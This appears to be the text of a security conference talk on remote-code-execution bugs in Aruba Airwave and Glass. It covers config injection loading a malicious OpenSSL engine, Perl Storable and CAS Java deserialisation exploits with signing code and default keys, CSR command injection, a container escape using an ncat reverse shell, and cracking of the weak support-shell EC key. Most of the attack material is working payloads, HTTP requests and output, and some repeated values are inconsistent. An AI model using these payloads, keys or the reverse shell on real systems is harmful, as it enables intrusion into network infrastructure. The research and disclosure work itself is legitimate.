    s{{\"}}{{\"}}xmsg;
}

my $input = <<"EOF";

network={
    identity="$username2"
    password="$password2"

    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}

EOF
my $nas_ip_attr = sprintf '4:x:0x%02x%02x%02x%02x', split /\./, $nas_ip;
my $cmd_fmt = $class->eapol_test_path
    . qq{ -c '%s' -s '$secret_sh' -a '$radius_ip' -p '$port' -N
    '$nas_ip_attr' > '$eapol_out' };

<..snip..>
system(sprintf($cmd_fmt, $eapol_in)) == 0 or return undef;
}

my $text = do { 
    open(my $OUT, '<', $eapol_out) or die "Cannot open $eapol_out : $!";
    local $/;
    <$OUT>;
};
my ($authenticated, $role_name) = $class->extract_eapol_output($text);
# scan/parses the output of eapol_test2 with regexes
# to see what happened on the RADIUS side.
# see the sample output in the comments after __END__.

sub extract_eapol_output {
    my ($class, $text) = @_; 
    my $authenticated = $text =~ m{entering \s+ state \s+ AUTHENTICATED}xms; 
    my $role_name = ''; 
    if (my ($val) = $text =~ m{
        Attribute \s+ 26 \s+ 
        \[((Vendor-Specific[])] \s+ length=\d+ \s+
        Value: \s+ 000039e704..([0-9a-f]+) 
    }xms
    ) {
        # 000039e7 = 14823 = Vendor-Aruba
        # 04 = Admin Role (instead of User Role)
        # .. is the length of the following role name (+ 2 for some reason)
        $role_name = pack "H*", $val;
    }
    return ($authenticated, $role_name);
}
RADIUS message: code=2 (Access-Accept) identifier=7 length=242
Attribute 26 (Vendor-Specific) length=13
  Value: 000039e7040741646d696e
Attribute 26 (Vendor-Specific) length=58
  Value: 000001371134878cbcf45cdc0bb1d4f96ab42deaca08173d21a1a2c4772c09500992848c2da6d7761e3111891269606380873d0900027ac2
Attribute 26 (Vendor-Specific) length=58
  Value: 0000013710348c60f957c8953fd9d291242ec31f28a6245f100eba32de60e1169465f09db5d80947b20872910d62ab81cab996c09ab4d11f
Attribute 79 (EAP-Message) length=6
  Value: 03070004
Attribute 80 (Message-Authenticator) length=18
  Value: 179faaac34a6859778a3193524658e76
Attribute 1 (User-Name) length=11
  Value: 'anonymous'
“Hello, yes my username is:”

Any password
What is PMK? eapol_test2 says a valid authentication has failed due to a mismatched PMK.

Does it matter?

In the output there IS still the line 'entering state AUTHENTICATED'.

And it is NOT present when an invalid username/password is presented.

---

Yes, this is quite a hack.

We did not, however, find any suitable alternative.

If you do, please rewrite!
my $username2 = $username;
my $password2 = $password;
for ($username2, $password2) {
    s{"\"}"xmsg;
}
my $input = <<"EOF";

network={
    identity="$username2"
    password="$password2"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}

EOF
Inject newlines and new config options into the `eapol_test` config

Same config format as `wpa_supplicant`

OpenSSL Engine support - `pkcs11_engine_path`
OpenSSL Engine

The -engine argument is accepted by most common OpenSSL subcommands

Path to an “engine” which is a shared library on Linux

Loaded and executed when the OpenSSL command runs

```
$ cat myEngine.c
#include <unistd.h>
__attribute__((constructor))
    static void init() {
        execl("/bin/sh", "sh", ":c","echo `id`",NULL); }

$ gcc -fPIC -o a.o -c myEngine.c
$ gcc -shared -o myEngine.so -lcrypto a.o
$ openssl x509 -engine ./myEngine.so
uid=1000(user) gid=1000(user) groups=1000(user)...```
credential_0=asdas%22%0a}%0apkcs11_engine_path=/var/tftpboot/engineerce_so_0.bin%0anetwork={%0a%23a

asdas"
}

pkcs11_engine_path=/var/tftpboot/engineerce_so_0.bin
network={
#a
network={
    identity="asdas\"
}
pkcs11_engine_path=/var/tftpboot/enginerce_so_0.bin

network={
    password="whateverPassword"
    key_mgmt=WPA-EAP
eap=PEAP
    phase2="auth=MSCHAPV2"
}
POST /LOGIN HTTP/1.1
Host: 192.168.200.207
Content-Length: 149
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

credential_0=asdas%22%0a%0apkcs11_engine_path=/var/tftpboot/enginerce_so_0.bin%0a%0anetwork=%0a%23a&credential_1=whateverPasssword&destination=%2Findex.html

$ nc -vnlp 4444
Ncat: Listening on ::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.200.207.
id
uid=48(apache) gid=48(apache)
groups=48(apache),26(postgres),95(radiusd),996(amp)
Airwave Perl Deserialisation - CVE-2021-25152

Some endpoints in the Airwave web application deserialise Perl objects

These objects are signed with a per-install “salt” secret
- Can be obtained using a SQLi (of which there were several)

Objects transported as Base64 encoded raw bytes client <-> server
Perl Deserialisation

Several Perl libraries for serialising/deserialising data

Data::Dumper - intended to be eval’d

Storable (Freeze/Thaw)

JSON or YAML or XML

and more...
Perl Deserialisation

Few details on exploiting deserialisation in Perl compared to deserialisation bugs in other languages

Top three resources:

Agarri.FR - Deserialization in Perl v5.8 (2016)
https://www.agarri.fr/blog/archives/2016/02/06/deserialization_in_perl_v5_8/index.html

https://www.youtube.com/watch?v=Gzx6KlqilZE

The Storable security problem (2012)
https://www.masteringperl.org/2012/12/the-storable-security-problem/
CODE REFERENCES

Since Storable version 2.05, CODE references may be serialized with the help of `B::Deparse`. To enable this feature, set `$Storable::Deparse` to a true value. To enable deserialization, `$Storable::Eval` should be set to a true value. Be aware that **deserialization is done through `eval`, which is dangerous** if the Storable file contains malicious data. You can set `$Storable::Eval` to a subroutine reference which would be used instead of `eval`. See below for an example using a Safe compartment for deserialization of CODE references.

SECURITY WARNING

Do not accept Storable documents from untrusted sources!

Some features of Storable can lead to security vulnerabilities if you accept Storable documents from untrusted sources with the default flags. Most obviously, the optional (off by default) CODE reference serialization feature allows transfer of code to the deserializing process. Furthermore, any serialized object will cause Storable to helpfully load the module corresponding to the class of the object in the deserializing module. For manipulated module names, this can load almost arbitrary code. Finally, the deserialized object’s destructors will be invoked when the objects get destroyed in the deserializing process. Maliciously crafted Storable documents may put such objects in the value of a hash key that is overridden by another key/value pair in the same hash, thus causing immediate destructor execution.
sub _fetch_builder_vars {
    my ($self) = @_;

    my $r = $self->$r;

    my $list_class = $r->param('list_class');
    assert { defined $list_class } 'Request must define list_class param';

    my $b64_init_args = $r->param('init_args');
    $b64_init_args =~ tr/ /+/;
    my $init_args = decode_base64($b64_init_args);

    die "Invalid signature!\n" unless Mercury::Utility::Checksum->verify(
        $init_args, $r->param('init_args_signed'));

    return (
        list_creation_args => thaw_hash_with_code($init_args),
        list_class => $list_class,
    );
}
sub sign {
    my ($class, $data) = @_; 
    my $sig = md5_base64($data . Mercury::DB::SeasConfig->get->salt);
    $sig =~ tr{+/=}{__,-};
    return $sig;
}

sub verify {
    my ($class, $data, $sig) = @_; 
    return safe_equal($sig, $class->sign($data));
}
push @EXPORT, 'thaw_hash_with_code';
sub thaw_hash_with_code {
    my ($frozen) = @_;  
    local $Storable::Eval = 1;
    return ${thaw($frozen)};
}
sub DESTROY {
    my ($self) = @_;

    # LWP steps on @
    local $@;

    $self->destroyer->($self) if $self->{destroyer};
}

Requires coderef!
use Storable qw(freeze thaw nfreeze);
use MIME::Base64 qw( decode_base64 encode_base64 );
local $Storable::Deparse = 1;
{
    package Mercury::HTTP;
}

my $h;
$h->{"destroyer"} = sub {
    my $out = `sleep 8`;
    print STDERR "Executing arbitrary code $out";
};

bless $h, "Mercury::HTTP";
print encode_base64(nfreeze($h));

Exploit - Construct Object
use Digest::MD5 qw(md5_base64);
use MIME::Base64;

sub sign {
    my ($data) = @_;  
    my $salt = <<'SALTVAL';  
        #select salt from seas_config;
C53CI3yf0N//ec5pW4IeCsIvcum1RLVxhM3vho4HdbSK+TAPSFWogSM7bcjwWE+q1K0tAFpmEYb
rpL1RYHoxp0g10eUAuw4PSh41lUCHfoAdikqzow=
SALTVAL
    my $sig = md5_base64($data . $salt);
    $sig =~ tr{+/=}{__,__};
    return $sig;
}

my $target = 
"BQoRDU1lcmN1cnk6OkhUVFADA4AAAQQaF057CiAgICBteSAkb3V0ID0gYHNsZWBwIDhgOwogICAgcHJpbnQgU1RERVJSICJFeGVjdXRpbmcgYXJiaXRyYXJ5IGNvZGUgJG91dCI7Cn0AAAAJZGVzdHVyeWVy"

$target =~ s/\n/%0a/g;
print "Target = $target\nSigned = " . sign(decode_base64($target)) . "\n";
POST /list_edit.xml? HTTP/1.1
Host: 192.168.200.207
Cookie: MercuryAuthHandlerCookie_AMPAuth=JaypkAwSaTgGvMJbEsC2Bg9IB8ZkeNBJ
Content-Length: 537
X-Biscotti: /PDdz1HtC1dPddlIFoscdBQ
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
alert_summary_list_reverse=1&alert_summary_list_max_for_all_records=2000&alert_summary_list_total_pages=1&alert_summary_list_sort_field=type&alert_summary_list_page=1&alert_summary_list_page_length=25&list_class=Mercury%3A%3AHandler%3A%3AAlertList%3A%3ASummaryList%3A%3AList&list_uri=%2Froot&init_args=BQoRDU1lcmN1cnk6OkhUVFADAAAAAQQaF057CiAgICBteSAkb3V0ID0gYHNsZmVwIDhgoWogICAg%0acHJpbnnQgU1RERVJSICJFeGVjdXRpbmcgYXJiaXRyYXJ5IGNvZGUgJG91dCI7Cn0AAAAAJZGVzdHJv%0aeWVy%0a
Signed = IKWwh7k1UOl6JVt_0xFujQ

alert_summary_list_reverse=1&alert_summary_list_max_for_all_records=2000&alert_summary_list_total_pages=1&alert_summary_list_sort_field=type&alert_summary_list_page=1&alert_summary_list_page_length=25&list_class=Mercury%3A%3AHandler%3A%3AAlertList%3A%3ASummaryList%3A%3AList&list_uri=%2Froot&init_args=BQoRDU1lcmN1cnk6OkhUVFADAAAAAQQaF057CiAgICBteSAkb3V0ID0gYHNsZmVwIDhgoWogICAg%0acHJpbnnQgU1RERVJSICJFeGVjdXRpbmcgYXJiaXRyYXJ5IGNvZGUgJG91dCI7Cn0AAAAAJZGVzdHJv%0aeWVy%0a
Signed = lwdozbY1EGrcO75akEn7Xg

init_args_signed=1wdozbY1EGrcO75akEn7Xg&in_multi_edit=0&header_only=0
8.2.11 - Character filter

```perl
if ($init_args =~ /([`;])/) {
  my $out = system("id")
}
```

8.2.11.1 - Safe with require

```perl
my $safe = new Safe;
$safe->permit(qw(:default require caller));
```

8.2.12.0 - Safe without require

```perl
my $safe = new Safe;
$safe->permit(qw(:default caller));
```

8.2.12.0 - Safe without require

```perl
my $safe = new Safe;
$safe->permit(qw(:default caller));
```
Later on

```
user@k4:/tmp$ xxd in
00000000: 040b 0831 3233 3435 3637 3804 0808 0803  ...12345678.....
00000010: 0100 0000 041a 0a4b 7b0a 2020 2020 7573  ........K{.  us
00000020: 6520 7374 7269 6374 3b0a 2020 2020 7072  e strict;.  pr
00000030: 696e 7420 2772 756e 6e69 6e67 6161 6161  int 'runningaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaaa
00000050: 273b 7d3b 7072 696e 7420 6069 6460 3b7b  ';};print `id`;{
00000060: 200a 7d01 0000 0061   }......a
```
Thaw with Storable::EVAL = 1

```
user@k4:/tmp$ perl c.pl
uid=1000(user) gid=1000(user) groups=1000(user),20(dialout),24(cdrom)
46(plugdev),109(netdev),118(bluetooth),120(wireshark),133(scanner),14
c ode sub {
    use strict;
    print 'runningaaaaaaaaaaaaaaaaaaaaaaaaaa';};print `id`;
} did not evaluate to a subroutine reference, at c.pl line 30.
user@k4:/tmp$
```
Airwave Glass - Target 4

“Single pane of glass”

Collates Aruba Airwave Data

Kubernetes on Ubuntu (previously CoreOS)

Microservices in containers

Virtual Appliance / Physical Hardware

**Devices**

- Memory: 96 GB
- Processors: 16
- Hard Disk (SCSI): 1 TB
*Numerous exclusions
<table>
<thead>
<tr>
<th>NAMESPACE</th>
<th>NAME</th>
<th>READY</th>
<th>STATUS</th>
<th>RESTARTS</th>
<th>AGE</th>
</tr>
</thead>
<tbody>
<tr>
<td>acp-system</td>
<td>acp-upgrade-cbp9k</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>acp-system</td>
<td>rabbitmq-node-25xn2</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>acp-system</td>
<td>webproxy-clnjg</td>
<td>1/1</td>
<td>Running</td>
<td>2</td>
<td>17m</td>
</tr>
<tr>
<td>acp-system</td>
<td>webproxy-tjhwn</td>
<td>1/1</td>
<td>Running</td>
<td>2</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>docker-registry-fkd12</td>
<td>0/1</td>
<td>Pending</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-api-23sv5</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-bootstraper-wrnl</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>16m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-cas-3j3f6</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-casdb-561f6</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-coreupdate-x3n0b</td>
<td>2/2</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-decoder-m3vg6</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-decoder-pdl2l</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-elasticsearch-d6hp5</td>
<td>1/1</td>
<td>Running</td>
<td>2</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-elasticsearch-data-2nm2g</td>
<td>1/1</td>
<td>Running</td>
<td>2</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-infra-4rzkj</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>16m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-overwatch</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-reporter-27kmm</td>
<td>1/1</td>
<td>Running</td>
<td>2</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-writer-172w8</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-writer-clpdr</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>glass-system</td>
<td>glass-writer-vhzwx</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>elasticsearch-logging-v1-49znv</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>fluentd-elasticsearch-192.168.200.34</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>heapster-1979764923-p4j4j</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kibana-logging-v1-rq59p</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-apiserver-192.168.200.34</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-controller-manager-192.168.200.34</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-dns-v20-drrln</td>
<td>0/3</td>
<td>Pending</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-dns-v20-nd451</td>
<td>3/3</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-dns-v20-xrj91</td>
<td>0/3</td>
<td>Pending</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-proxy-192.168.200.34</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kube-scheduler-192.168.200.34</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>kubernetes-dashboard-1236032568-wsxrk</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>monitoring-grafana-3523390237-9t9db</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
<tr>
<td>kube-system</td>
<td>monitoring-influxdb-3084216226-nh6g6w</td>
<td>1/1</td>
<td>Running</td>
<td>0</td>
<td>17m</td>
</tr>
</tbody>
</table>
Review nginx.conf

# cat nginx.conf | egrep "location|proxy_pass"

```bash
location = /50x.html {
    location / {
        location / {
            proxy_pass http://http_glass-api_server;
            location /ws {
                proxy_pass http://https_acp-websocketx_server;
            }
            location /swarm {
                proxy_pass http://https_acp-swarm_server;
            }
            location /status {
                proxy_pass http://https_acp-websocketx_server;
            }
            location /device {
                proxy_pass http://https_acp-websocketx_server;
            }
            location /devicecount {
                proxy_pass http://https_acp-websocketx_server;
            }
            location /infra/api {
                proxy_pass http://http_glass_infra;
            }
            location /cas {
                proxy_pass https://https_glass-cas_server;
            }
            location /decoder {
                proxy_pass http://http_glass-decoder_server;
            }
        }
    }
}
```

location /decoder {
    proxy_pass http://http_glass-decoder_server;
}
location /upgrade {
    proxy_pass http://http_acp-upgrade_server;
}
location /kubernetes-dashboard/ {
    proxy_pass http://http_kubernetes-dashboard_server;
}
location /kibana-logging/ {
    proxy_pass http://http_kibana-logging_server;
}
location /monitoring-grafana/ {
    proxy_pass http://http_monitoring-grafana_server;
}
location /core {
    proxy_pass http://http_glass-coreupdate_server;
}
location /packages {
    proxy_pass http://http_glass-coreupdate_server;
}
location /cp {
    proxy_pass http://http_glass-coreupdate_server;
}
location /_ah {
    proxy_pass http://http_glass-coreupdate_server;
}
location /skedler/ {
    proxy_pass http://http_glass-reporting_server;
}
```
POST /glass/cert/csr HTTP/1.1
Host: <glass>
Cookie: awSession=<valid>
Content-Length: 158
Content-Type: application/json
Kbn-Version: 4.5.2-snapshot

{"csrType":"RSA","cn":"as`id`d.example.local","country":"NZ","state":"a","location":"a","org":"a","dept":"a","email":"a@example.local","san":"192.168.200.77"}
/glass is partially an authentication layer that calls API endpoints in other pods

Some of these API endpoints are also exposed directly via the nginx proxy

They did not implement authentication

```
location /infra/api {
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_pass http://http_glass_infra;
    add_header Front-End-Https on;
    proxy_read_timeout 600;
    proxy_send_timeout 600;
    expires -1;
}
```
POST /infra/api/cert/createCsr HTTP/1.1
Host: <glass>
Content-Length: 158
Content-Type: application/json
Kbn-Version: 4.5.2-snapshot

{"csrType":"RSA","cn":"as\`id\`d.example.local","country":"NZ","state":"a","location":"a","org":"a","dept":"a","email":"a@example.local","san":"192.168.200.77"}

"data":"unknown option gid=0(root)"
Volume Mounts:
/etc/docker from docker-certs (rw)
/etc/kubernetes/manifests from controller (rw)
/etc/kubernetes/ssl from kubernetes-certs (rw)
/etc/shadow from complete-etc (rw)
/etc/systemd from systemd (rw)
/opt from opt-path (rw)
/root/.docker/config.json from docker-conf (rw)
/var/airwave/glass from airwave-glass (rw)
/var/lib/iptables from iptables (rw)
/var/run from docker-sock (rw)
/var/run/secrets/kubernetes.io/serviceaccount from default-token-gq4sm (ro)

$ docker inspect --format='{{.HostConfig.Privileged}}' bef7400a8ee1
true
Full cluster compromise

$ cat /etc/systemd/system/escalate.service
[Unit]
Description=Escapes Container

[Service]
Type=oneshot
User=root
ExecStart=/bin/ncat 192.168.200.137 1235 -e /bin/bash

$ systemctl daemon-reload
$ systemctl start escalate.service

$ nc -vnlp 1235
Ncat: Listening on :::1235
Ncat: Listening on 0.0.0.0:1235
Ncat: Connection from 192.168.200.34.
Ncat: Connection from 192.168.200.34:50314.
hostname
glassy2.example.local
cat /proc/1/sched
systemd (1, #threads: 1)
CAS deserialize RCEs - CVE-2020-24639

Glass authentication uses an Apereo CAS container (SSO)

Originally CAS version 4.1.4

https://apereo.github.io/2016/04/08/commonsvulndisc/

CommonsCollections2 gadget

At the time of my discovery no public exploit POC (there is now)

https://github.com/vulhub/vulhub/tree/master/apereo-cas/4.1-rce

https://xz.aliyun.com/t/7032
Quick Overview

Execution parameter contains an interesting object (prefixed with GUID)
Gzipped and Encrypted and Base64-d serialized Java object
Encrypted using default key in a publicly available Spring Webflow keystore
CommonsCollections2 gadget

POST /cas/login?service=https%3A%2F%2F<glass>%2Fverifycas HTTP/1.1
Host: <glass>
Content-Length: 2175
Content-Type: application/x-www-form-urlencoded

username=admin&password=invalid&lt=LT-2-9tIBJ10GFNKKmPvz3MjHUXxWaRVpf-glass.airwave.com&execution=ffffffff-ffff-ffff-ffff-
fffffffffffffff_AAAAAIgAAABBPdpiyoS5US19s0w8UZh/AAAAABmFlczEyOOR3NbKEgkB321<..snip..>&_eventId=
d=submit&submit=LOGIN
CAS 4.1.7

Aruba updated Glass 1.3.1 CAS version to 4.1.7 (fixed according to vendor)

Alters how the object is encrypted, uses a secret signing key

Apache Commons libraries removed
Vendor Fix details

CAS 4.1.x

Overlay

Modify your CAS overlay to point to version 4.1.7.

TGC Settings

Locate your cas.properties file and find the tgc.* settings.

- If your CAS deployment is **NOT** using the default encryption/signing keys provided by CAS and you have regenerated new keys and have replaced the default, you can safely ignore this step and leave your key configuration of signing/encryption in place without any further changes.

- If your CAS deployment **IS** using the default encryption/signing keys provided by CAS and you have **NOT** regenerated new keys to replace the default, you **MUST** take action to regenerate the keys.

You can choose one of the two approaches described below to handle key regeneration.
Default Webflow keys

Aruba didn’t change the keys they were using between versions

```plaintext
webflow.encryption.key=CH1ISdA6lINbOnySN
webflow.signing.key=7D5yV54GiNXTVFfSDm0tpw4p-eheyv1U0UySyf3-tIEU_dGoepn3cLZJnmxHmsRq5-BWkJzeppCzu0wjip5_1g
```
import java.io.*;
import java.util.Base64;
import org.jasig.cas.util.BinaryCipherExecutor;
import java.nio.file.*;
import java.util.zip.GZIPOutputStream;

public class ExploitCompile {
    public static void main(String[] args) throws IOException {
        // default from CAS and replicated in the Glass instance
        BinaryCipherExecutor b = new BinaryCipherExecutor("CHlSdA6IINbOnySN","7D5yV54G1NXTVFfSDm0tpw4p-eheyv1U0UySyf3-tIEU_dGoepn3cLZJhmxHmsRq5-BWkIzeppCzu0wjip5_1g");
        byte[] filebytes = Files.readAllBytes(Paths.get(args[0]));
        ByteArrayOutputStream byteStream = new ByteArrayOutputStream();
        GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteStream);
        gzipOutputStream.write(filebytes);
        gzipOutputStream.close();
        byte[] bb = b.encode(byteStream.toByteArray());
        byte[] encoded = Base64.getEncoder().encode(bb);

        System.out.printf("ffffffff-ffff-ffff-ffff-%s", new String(encoded).replace("=" , "%3d"));
    }
}
Gadget Whack-A-Mole

COMMONS COLLECTIONS2  C3PO / MCHANGE  HIBERNATE1  SPRING3
Demo Time

~3 min demo
Getting Started Yourself

Research access to Virtual Appliances via disk

“But dozer how can I research the hardware APs?”

Let us revisit the “exploit for AP access” requirement earlier on
Support Interface

ArubaOS has a CLI “support” command for use with Aruba customer support

For “debugging purposes only”

“Do not use this command without the guidance of Aruba customer support.”
Implements some sort of challenge-response...

Username (Please enter with @domain.com, in lowercase): asdf

Token: 40EC-FE8B-BE42-0BB5
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password: test

Invalid password! Please retry.
Username (Please enter with @domain.com, in lowercase):
Starting with AOS 6.5, new AOS builds removed support of logging into the support shell using a static password. Below are the steps that TAC and QA needs to follow to gain access to support shell on any nightly or customer build:

1. Type **support** on the CLI. Enter your username when prompted for username. This is the same username that we internally use to log into intranet. Please make sure to enter the full email address (including @arubanetworks.com).
2. The above step will generate one time token that will be printed on the console.
3. Go to [https://ase.arubanetworks.com/decode_aos_key](https://ase.arubanetworks.com/decode_aos_key). Log into the website with the SSO username that you entered on the controller.
4. Generate a one time password from ASE and paste into controller.

This tool is restricted to TAC GEC teams and QA teams.

Sample:

```
(Aruba7010) #support
Username (Please enter with @domain.com): kpatel@arubanetworks.com
Token: 99D96CE721CA245B
Please generate one time password at [https://ase.arubanetworks.com/decode_aos_key](https://ase.arubanetworks.com/decode_aos_key)
Password: 82416aa63b475a3
(Aruba7010) (support)#
```
Not Authorized

Your account does not have access to this page or to perform this operation.

AOS/IAP Token:
759A6FB352BC5F63
Support Command

Uses Elliptic Curve Diffie-Hellman (ECDH)

Key agreement over untrusted channel

\[ P = \text{Curve Prime} \]
\[ N = \text{Curve Order} \]
\[ A, B = \text{Curve Constants} \]

Points with X/Y Coordinates:
- \( G = \text{Generator / Base Point} \)
- \( Q = \text{Public Key} \)

```c
else {
    p_00 = (BIGNUM *)EC_POINT_new((EC_GROUP *)group);
    ptr = p_00;
    if ((p_00 != (BIGNUM *)0x0) &&
        (ptr = (BIGNUM *)
            EC_POINT_set_affine_coordinates_GFp
            ((EC_GROUP *)group, (EC_POINT *)p_00, local_38
             ,
             local_34, (BN_CTX *)ctx), ptr != (BIGNUM *)0
             x0)) {
        BN_hex2bn(&local_40, "JAB52C676D253232");
        BN_hex2bn(&local_3c, "SCEBB232132200DA");
        ptr = (BIGNUM *)
            EC_POINT_set_affine_coordinates_GFp
            ((EC_GROUP *)group, (EC_POINT *)p, local_40,
             local_3c, (BN_CTX *)ctx);
```
Support Command

Initially reversed from a compiled binary

Implementation was available in the public GPL repo!

```c
/**
 * server public key (note: THIS IS NOT THE REAL ONE!!!!)
 */

BN_hex2bn(&serverx, "3A5C2C676D253232");
BN_hex2bn(&servery, "5CEBB2321232880A");
if (!EC_POINT_set_affine_coordinates_GFp(grp, serverpub, serverx, servery, bnctx)) {
    printf("\n unable to set server's public key\n");
}
```

That actually is the public key (but no private key included)

https://github.com/shalzz/aruba-ap-310/blob/master/utils/utelnetd-0.1.3/utelnetd.c#L356
Aruba Support EC Constants

Elliptic Curve defined by $y^2 = x^3 + 6603131452740097707^*x + 14027436235390310386$ over Finite Field of size $18321631492787798783$

Generator / Base Point $G = (0xBB3C71C351AAE96B, 0x830B4345D75E9275)$

Aruba Support has a fixed public key $Q$, contained in the binary/source:
$(0x3A5C2C676D253232, 0x5CEBB232132200DA)$

Curve Order = $18321631499947426219$
Generate a public/private keypair on device

Output the generated public key point X coordinate

This is the “Token” value output in the CLI command.
The pubkey X coordinate is provided to Aruba Support

They calculate the ECDH shared secret

Shared secret X coordinate is used to derive the support password, which is returned to allow support prompt access

Support password derived from the ECDH shared secret as follows:

\[
\text{digest1} = \text{SHA1}\_\text{HMAC}(\text{key} = \text{x00}*20, \text{data}=\text{shared}\_\text{secret})
\]

\[
\text{support\_password} = \text{SHA1}\_\text{HMAC}(\text{key} = \text{digest1}, \text{data}=\text{username}+\text{x01}[0:8])
\]

We don't know Aruba Support's private key

Can't access the generated device private key without full system access
/*
 * the random 64-bit elliptic curve
 */
BN_hex2bn(&p, "FE4382C5413A02FF");
BN_hex2bn(&a, "5BA3091245C856AB");
BN_hex2bn(&b, "C2AB76EF7FE1D7F2");
BN_hex2bn(&genx, "BB3C71C351AAE96B");
BN_hex2bn(&geny, "830B4345D75E9275");

/* Using the custom adapted function
EC_GROUP_new_curve_GFp_custom for FIPS mode
to skip the NIST validation of the parameters used
in the EC curve generation,
which is used to generate the token and one-time-
password. This is done to keep
the token size as 16 bytes, which would get longer
in case NIST compliant
parameters are used */

64-bit modulus elliptic curve

Elliptic Curves are smaller than equivalent RSA but not that small!

2048 bit RSA \(\sim 224\) bit EC

Token size is actually 8 bytes
Cracking the EC key

EC key security strength is roughly \( \frac{1}{2} \) modulus size

64 bit EC \( \approx \) 32 bits of security strength (NIST term)

Requires solving the “elliptic curve discrete logarithm program” (ECDLP)

Within range of a desktop computer
# Desktop ECDLP Benchmark Numbers

<table>
<thead>
<tr>
<th>Curve Size</th>
<th>Sage (single thread)</th>
<th>PCS (single thread C)</th>
<th>PCS (16 threads)</th>
</tr>
</thead>
<tbody>
<tr>
<td>40 bit</td>
<td>60 seconds</td>
<td>250ms</td>
<td>50ms</td>
</tr>
<tr>
<td>56 bit</td>
<td>30000 seconds (8 hrs)</td>
<td>109 seconds</td>
<td>12 seconds</td>
</tr>
<tr>
<td>64 bit</td>
<td>? (ages)</td>
<td>2000 seconds</td>
<td>220 seconds</td>
</tr>
</tbody>
</table>

[https://github.com/mtrimoska/PCS](https://github.com/mtrimoska/PCS)
Parallel collision search
PCS with 16 cores

P: 18321631492787798783
A: 6603131452740097707
B: 14027436235390310386
Order: 18321631499947426219
Q.X: 4205284974781608498
Q.Y: 6695641199155478746
Generator.X: 13491783667397880171
Generator.Y: 9442715010957480565
Run complete - should have secret key x now
Secret key: [hidden]
Public key x: 4205284974781608498
Public key y: 6695641199155478746
Points: 53416
Empty slots: 0

real    2m22.539s
FASTER.

DLP can be solved in faster time when the order of the curve can be factored to smaller numbers.

Common for Elliptic Curves to use prime orders to prevent this.

Pohlig-Hellman algorithm

Solve ECDLPs with factors of order, then combine via CRT

Pollard’s Rho ECDLP $\sim \sqrt{n}$

Pohlig-Hellman + Rho $= \sqrt{p}$ where p is the largest prime factor of n
$y^2 = x^3 + 6603131452740097707^*x + 14027436235390310386$ over Finite Field of size $18321631492787798783$

Order: $18321631499947426219$ (64 bits)

Factors: $15017^*93889^*12994699763$

Largest factor is only 40 bits!

